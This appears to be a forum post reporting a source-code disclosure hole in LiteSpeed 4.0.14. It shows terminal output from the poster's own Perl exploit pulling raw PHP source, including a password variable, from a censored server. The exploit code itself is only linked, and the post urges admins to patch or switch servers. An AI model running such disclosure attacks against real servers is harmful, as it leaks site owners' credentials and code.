4.0.14 is vulnerable under my tests.
bin/lshttpd.4.0.14: ELF 64-bit LSB executable, AMD x86-64, version 1 (GNU/Linux), statically linked, stripped
However, the exploit linked here did *NOT* work. I had to write my own version to get reproducible effects.
Here is the source: pastebin.ca/1882204 (can't directly link, I don't have 5 posts).
-05:04:20- seraphic:~/test luna% ./litespeed.pl <censored> /test.php
[.] webserver accepted the request
[.] <censored>:80 is running LiteSpeed
[+] file (test.php.txt) has been saved.
-05:07:03- seraphic:~/test luna% cat <censored>\:80-test.php
$super_secure_password = "vulnerable";
Yes, I am aware the reported file it saves to is wrong, I wrote it at 4 in the morning. Cut me a little slack.
Tell everybody you know running LiteSpeed (especially in place of Apache on cPanel servers, like I'm doing) to either hotfix with mod_security (does this work?) or switch back to Apache until an upgrade is released.